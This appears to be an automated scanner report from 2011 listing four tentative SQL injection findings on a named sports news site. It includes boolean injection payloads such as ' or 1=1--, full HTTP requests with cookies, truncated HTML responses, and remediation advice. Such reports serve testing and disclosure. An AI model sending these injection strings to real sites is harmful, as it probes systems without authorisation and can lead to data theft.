SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://aol.sportingnews.com/ [name of an arbitrarily supplied request parameter] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://aol.sportingnews.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?1%20and%201%3d1--%20=1 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575073218-New%7C1367647073218%3B%20s_nrgvo%3DNew%7C1367647073220%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
X-N: S
Cache-Control: max-age=30
Date: Thu, 05 May 2011 01:12:31 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 105496

<!DOCTYPE html>



<a href="http://aol.sportingnews.com" class="sn-feed-logo">
<img src="http://st.snimg.com/image/feed/logos/logo_spnews_launch.png" alt="Sporting News Feed Logo">
</a>
<script>
$('form#header-search div.search-icon, form#footer-search div.search-icon').live('click', function(){
$(this).parent().parent().submit();
}).live('mouseover mouseout', function(event){
if (event.type == 'mouseover') {
$(this).addClass('on');
} else {
$(this).removeClass('on');
}
});
</script>

<div class="search rounded-corners clearfix">
<form id="header-search" method="get" action="/search">
<fieldset>
<label for="search-box">Find on SN</label>
<input id="search-box" name="search_term" type="text">
<div class="search-icon">Search</div>
</fieldset>
</form>
<div class="follow">
<span class="text">Follow SN</span>
<span class="facebook">
<a target="_blank" title="Sporting News Facebook Page" href="http://www.facebook.com/sportingnews">
Facebook
</a>
</span>
<span class="twitter">
<a target="_blank" title="Sporting News' Twitter Page" target="_blank" href="http://twitter.com/SportingNews">
Twitter
</a>
</span>
</div>
<div class="connect">
<span class="text">Connect with SN</span>
<span class="facebook-connect">
<fb:login-button show-faces="false" max-rows="1" width="80" auto
...[SNIP]...

Request 2

GET /?1%20and%201%3d2--%20=1 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575073218-New%7C1367647073218%3B%20s_nrgvo%3DNew%7C1367647073220%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
X-N: S
Cache-Control: max-age=28
Date: Thu, 05 May 2011 01:12:32 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 105521

<!DOCTYPE html>



<a href="http://aol.sportingnews.com" class="sn-feed-logo">
<img src="http://st.snimg.com/image/feed/logos/logo_spnews_launch.png" alt="Sporting News Feed Logo">
</a>
<script>
$('form#header-search div.search-icon, form#footer-search div.search-icon').live('click', function(){
$(this).parent().parent().submit();
}).live('mouseover mouseout', function(event){
if (event.type == 'mouseover') {
$(this).addClass('on');
} else {
$(this).removeClass('on');
}
});
</script>

<div class="search rounded-corners clearfix">
<form id="header-search" method="get" action="/search">
<fieldset>
<label for="search-box">Find on SN</label>
<input id="search-box" name="search_term" type="text">
<div class="search-icon">Search</div>
</fieldset>
</form>
<div class="follow">
<span class="text">Follow SN</span>
<span class="facebook">
<a target="_blank" title="Sporting News Facebook Page" href="http://www.facebook.com/sportingnews">
Facebook
</a>
</span>
<span class="twitter">
<a target="_blank" title="Sporting News' Twitter Page" target="_blank" href="http://twitter.com/SportingNews">
Twitter
</a>
</span>
</div>
<div class="connect">
<span class="text">Connect with SN</span>
<span class="facebook-connect">
<fb:login-button show-faces="false" max
...[SNIP]...

1.2. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [dimension parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://aol.sportingnews.com
Path:	/services/fantasy_source_rankings_ad.php

Issue detail

The dimension parameter appears to be vulnerable to SQL injection attacks. The payloads 29246186'%20or%201%3d1--%20 and 29246186'%20or%201%3d2--%20 were each submitted in the dimension parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /services/fantasy_source_rankings_ad.php?sport=mlb&dimension=180x15029246186'%20or%201%3d1--%20&limit=3 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575073218-New%7C1367647073218%3B%20s_nrgvo%3DNew%7C1367647073220%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 01:15:00 GMT
Cache-Control: max-age=300
Date: Thu, 05 May 2011 01:16:41 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4594

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #fs * { margin:0; padding:0; line-height:1em; font-family:arial,sans-serif; font-s
...[SNIP]...
e:11px; color:#000; }
#fs { display:block; width:180px; height:15029246186' or 1=1-- px; overflow:hidden; background:url(http://st.snimg.com/image/promos/fantasy-source/mlb-ad-bg-180x15029246186' or 1=1-- .jpg) no-repeat; }
#fs a, #fs a:visited { color:#004a85; font-weight:bold; text-decoration:none; }
#fs a:hover { color:#000; }
#fs h1 { font-size:17px; font-weight:bold; text-align:center; margin:9px 0; }
#fs table { border-collapse:collapse; border-bottom:1px solid #000; }
#fs th, #fs td { text-align:left; }
#fs th { border-bottom:1px solid #000; padding:0 7px 4px; }
#fs td { padding:4px 7px; border-left:1px solid #000; }
#fs td.rank { width:25px; border:none; text-align:center; }
#fs .more-link { text-align:right; margin:9px 11px 0 0; }
#fs .more-link a { font-size:12px; font-style:italic; font-weight:normal; }
#fs a.fs-logo { display:block; position:absolute; }
#fs.ad-300x250 table { width:280px; margin:0 10px; }
#fs.ad-300x250 a.fs-logo { width:300px; height:70px; top:180px; }
#fs.ad-728x90 h1 { width:220px; float:left; margin:12px 0 0 60px; line-height:1.2em; }
#fs.ad-728x90 h1, #fs.ad-728x90 .more-link a, #fs.ad-728x90 .more-link a:visited { color:#fff; }
#fs.ad-728x90 .more-link { width:220px; position:absolute; top:64px; left:60px; margin:0; text-align:center; }
#fs.ad-728x90 table { position:absolute; width:260px; top:7px; left:275px; }
#fs.ad-728x90 a.fs-logo { width:188px; height:90px; top:0; left:540px; }
#fs.ad-180x150 h1 { font-size:10px; margin:6px 0 2px; }
#fs.ad-180x150 table { width:172px; margin:0 4px; }
#fs.ad-180x150 th { padding:0 3px 3px; }
#fs.ad-180x150 td { padding:3px; }
#fs.ad-180x150 td.rank { width:5px; }
#fs.ad-180x150 .more-link { margin:4px 5px 0 0; }
#fs.ad-180x150 .more-link a { font-size:10px; }
#fs.ad-180x150 a.fs-logo { width:180px; height:45px; top:105px; }
</style>
<div id="fs" class="ad-180x15029246186' or 1=1-- ">
<h1>Fantasy Baseball 3B Rankings</h1>
<table>
<tr>
<th>Rk</th>
<th>Player</th>
<th>Pos</th>
<th>Tm</th>
</tr>
<tr>
<td class="rank">1</td>
<td><a href="http://fantasysource.sportingnew
...[SNIP]...

Request 2

GET /services/fantasy_source_rankings_ad.php?sport=mlb&dimension=180x15029246186'%20or%201%3d2--%20&limit=3 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575073218-New%7C1367647073218%3B%20s_nrgvo%3DNew%7C1367647073220%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 01:15:00 GMT
Cache-Control: max-age=280
Date: Thu, 05 May 2011 01:16:41 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4605

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #fs * { margin:0; padding:0; line-height:1em; font-family:arial,sans-serif; font-s
...[SNIP]...
e:11px; color:#000; }
#fs { display:block; width:180px; height:15029246186' or 1=2-- px; overflow:hidden; background:url(http://st.snimg.com/image/promos/fantasy-source/mlb-ad-bg-180x15029246186' or 1=2-- .jpg) no-repeat; }
#fs a, #fs a:visited { color:#004a85; font-weight:bold; text-decoration:none; }
#fs a:hover { color:#000; }
#fs h1 { font-size:17px; font-weight:bold; text-align:center; margin:9px 0; }
#fs table { border-collapse:collapse; border-bottom:1px solid #000; }
#fs th, #fs td { text-align:left; }
#fs th { border-bottom:1px solid #000; padding:0 7px 4px; }
#fs td { padding:4px 7px; border-left:1px solid #000; }
#fs td.rank { width:25px; border:none; text-align:center; }
#fs .more-link { text-align:right; margin:9px 11px 0 0; }
#fs .more-link a { font-size:12px; font-style:italic; font-weight:normal; }
#fs a.fs-logo { display:block; position:absolute; }
#fs.ad-300x250 table { width:280px; margin:0 10px; }
#fs.ad-300x250 a.fs-logo { width:300px; height:70px; top:180px; }
#fs.ad-728x90 h1 { width:220px; float:left; margin:12px 0 0 60px; line-height:1.2em; }
#fs.ad-728x90 h1, #fs.ad-728x90 .more-link a, #fs.ad-728x90 .more-link a:visited { color:#fff; }
#fs.ad-728x90 .more-link { width:220px; position:absolute; top:64px; left:60px; margin:0; text-align:center; }
#fs.ad-728x90 table { position:absolute; width:260px; top:7px; left:275px; }
#fs.ad-728x90 a.fs-logo { width:188px; height:90px; top:0; left:540px; }
#fs.ad-180x150 h1 { font-size:10px; margin:6px 0 2px; }
#fs.ad-180x150 table { width:172px; margin:0 4px; }
#fs.ad-180x150 th { padding:0 3px 3px; }
#fs.ad-180x150 td { padding:3px; }
#fs.ad-180x150 td.rank { width:5px; }
#fs.ad-180x150 .more-link { margin:4px 5px 0 0; }
#fs.ad-180x150 .more-link a { font-size:10px; }
#fs.ad-180x150 a.fs-logo { width:180px; height:45px; top:105px; }
</style>
<div id="fs" class="ad-180x15029246186' or 1=2-- ">
<h1>Fantasy Baseball Overall Rankings</h1>
<table>
<tr>
<th>Rk</th>
<th>Player</th>
<th>Pos</th>
<th>Tm</th>
</tr>
<tr>
<td class="rank">1</td>
<td><a href="http://fantasysource.sporti
...[SNIP]...

1.3. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [limit parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://aol.sportingnews.com
Path:	/services/fantasy_source_rankings_ad.php

Issue detail

The limit parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the limit parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /services/fantasy_source_rankings_ad.php?sport=mlb&dimension=180x150&limit=3'%20and%201%3d1--%20 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575176918-New%7C1367647176918%3B%20s_nrgvo%3DNew%7C1367647176919%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 01:30:00 GMT
Cache-Control: max-age=300
Date: Thu, 05 May 2011 01:32:33 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4376

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #fs * { margin:0; padding:0; line-height:1em; font-family:arial,sans-serif; font-s
...[SNIP]...
<a href="http://fantasysource.sportingnews.com/baseball/player/7172/dan-haren" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Dan Haren</a></td>
<td>SP</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/3/los-angeles-angels" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">LAA</a></td>
</tr>
<tr class="alt">
<td class="rank">2</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/8180/clayton-kershaw" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Clayton Kershaw</a></td>
<td>SP</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/19/los-angeles-dodgers" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">LAD</a></td>
</tr>
<tr>
<td class="rank">3</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/7790/jon-lester" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Jon Lester</a></td>
<td>SP</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/2/boston-red-sox" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Bos</a></td>
</tr>
</table>
<div class="more-link"><a href="http://fantasysource.sportingnews.com/baseball/rankings?pagetype=SP" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | see full');">See Full Top SP Rankings</a></div>
<a href="http://fantasysource.sportingnews.com/baseball/home" class="fs-logo" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | logo');"></a>
...[SNIP]...

Request 2

GET /services/fantasy_source_rankings_ad.php?sport=mlb&dimension=180x150&limit=3'%20and%201%3d2--%20 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575176918-New%7C1367647176918%3B%20s_nrgvo%3DNew%7C1367647176919%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 01:30:00 GMT
Cache-Control: max-age=300
Date: Thu, 05 May 2011 01:32:34 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4386

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #fs * { margin:0; padding:0; line-height:1em; font-family:arial,sans-serif; font-s
...[SNIP]...
<a href="http://fantasysource.sportingnews.com/baseball/player/5737/vladimir-guerrero" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Vladimir Guerrero</a></td>
<td>DH</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/1/baltimore-orioles" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Bal</a></td>
</tr>
<tr class="alt">
<td class="rank">2</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/5909/david-ortiz" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">David Ortiz</a></td>
<td>DH</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/2/boston-red-sox" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Bos</a></td>
</tr>
<tr>
<td class="rank">3</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/6980/travis-hafner" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Travis Hafner</a></td>
<td>DH</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/5/cleveland-indians" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Cle</a></td>
</tr>
</table>
<div class="more-link"><a href="http://fantasysource.sportingnews.com/baseball/rankings?pagetype=DH" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | see full');">See Full Top DH Rankings</a></div>
<a href="http://fantasysource.sportingnews.com/baseball/home" class="fs-logo" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | log
...[SNIP]...

1.4. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://aol.sportingnews.com
Path:	/services/fantasy_source_rankings_ad.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 87821652%20or%201%3d1--%20 and 87821652%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /services/fantasy_source_rankings_ad.php?sport=mlb&dimension=180x150&lim/187821652%20or%201%3d1--%20it=3 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575176918-New%7C1367647176918%3B%20s_nrgvo%3DNew%7C1367647176919%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 01:30:00 GMT
Cache-Control: max-age=300
Date: Thu, 05 May 2011 01:32:46 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5497

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #fs * { margin:0; padding:0; line-height:1em; font-family:arial,sans-serif; font-s
...[SNIP]...
<h1>Fantasy Baseball DH Rankings</h1>
<table>
<tr>
<th>Rk</th>
<th>Player</th>
<th>Pos</th>
<th>Tm</th>
</tr>
<tr>
<td class="rank">1</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/5737/vladimir-guerrero" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Vladimir Guerrero</a></td>
<td>DH</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/1/baltimore-orioles" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Bal</a></td>
</tr>
<tr class="alt">
<td class="rank">2</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/5909/david-ortiz" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">David Ortiz</a></td>
<td>DH</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/2/boston-red-sox" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Bos</a></td>
</tr>
<tr>
<td class="rank">3</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/6980/travis-hafner" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Travis Hafner</a></td>
<td>DH</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/5/cleveland-indians" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Cle</a></td>
</tr>
<tr class="alt">
<td class="rank">4</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/playe
...[SNIP]...

Request 2

GET /services/fantasy_source_rankings_ad.php?sport=mlb&dimension=180x150&lim/187821652%20or%201%3d2--%20it=3 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575176918-New%7C1367647176918%3B%20s_nrgvo%3DNew%7C1367647176919%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 01:30:00 GMT
Cache-Control: max-age=300
Date: Thu, 05 May 2011 01:32:46 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5513

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #fs * { margin:0; padding:0; line-height:1em; font-family:arial,sans-serif; font-s
...[SNIP]...
<h1>Fantasy Baseball Overall Rankings</h1>
<table>
<tr>
<th>Rk</th>
<th>Player</th>
<th>Pos</th>
<th>Tm</th>
</tr>
<tr>
<td class="rank">1</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/6619/albert-pujols" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Albert Pujols</a></td>
<td>1B</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/24/st-louis-cardinals" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">StL</a></td>
</tr>
<tr class="alt">
<td class="rank">2</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/7488/hanley-ramirez" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Hanley Ramirez</a></td>
<td>SS</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/28/florida-marlins" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Fla</a></td>
</tr>
<tr>
<td class="rank">3</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/7946/joey-votto" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Joey Votto</a></td>
<td>1B</td>
